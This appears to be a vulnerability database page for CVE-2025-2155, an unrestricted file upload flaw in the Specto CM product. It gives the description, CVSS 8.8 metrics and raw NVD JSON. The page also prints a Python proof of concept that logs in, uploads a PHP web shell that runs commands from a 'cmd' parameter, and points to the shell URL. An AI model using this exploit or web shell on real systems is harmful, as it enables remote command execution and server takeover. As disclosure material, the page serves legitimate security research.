Security Vulnerability Report
中文
CVE-2025-2155 CVSS 8.8 HIGH

CVE-2025-2155

Published: 2025-12-24 15:16:01
Last Modified: 2026-04-15 00:35:42

Description

Unrestricted Upload of File with Dangerous Type vulnerability in Echo Call Center Services Trade and Industry Inc. Specto CM allows Remote Code Inclusion.This issue affects Specto CM: before 17032025.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Specto CM < 17032025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-2155 PoC - Specto CM Unrestricted File Upload RCE import requests import sys target = "http://target.com/specto_cm" upload_endpoint = f"{target}/api/upload" username = "attacker" password = "password" session = requests.Session() login_data = {"username": username, "password": password} session.post(f"{target}/login", data=login_data) webshell = '''<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; } ?>''' files = {"file": ("shell.php", webshell, "application/x-php")} try: response = session.post(upload_endpoint, files=files) if response.status_code == 200: print(f"[+] File uploaded successfully") print(f"[+] Access shell at: {target}/uploads/shell.php?cmd=whoami") else: print(f"[-] Upload failed: {response.status_code}") except Exception as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-2155", "sourceIdentifier": "[email protected]", "published": "2025-12-24T15:16:01.100", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in Echo Call Center Services Trade and Industry Inc. Specto CM allows Remote Code Inclusion.This issue affects Specto CM: before 17032025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0480", "source": "[email protected]"}]}}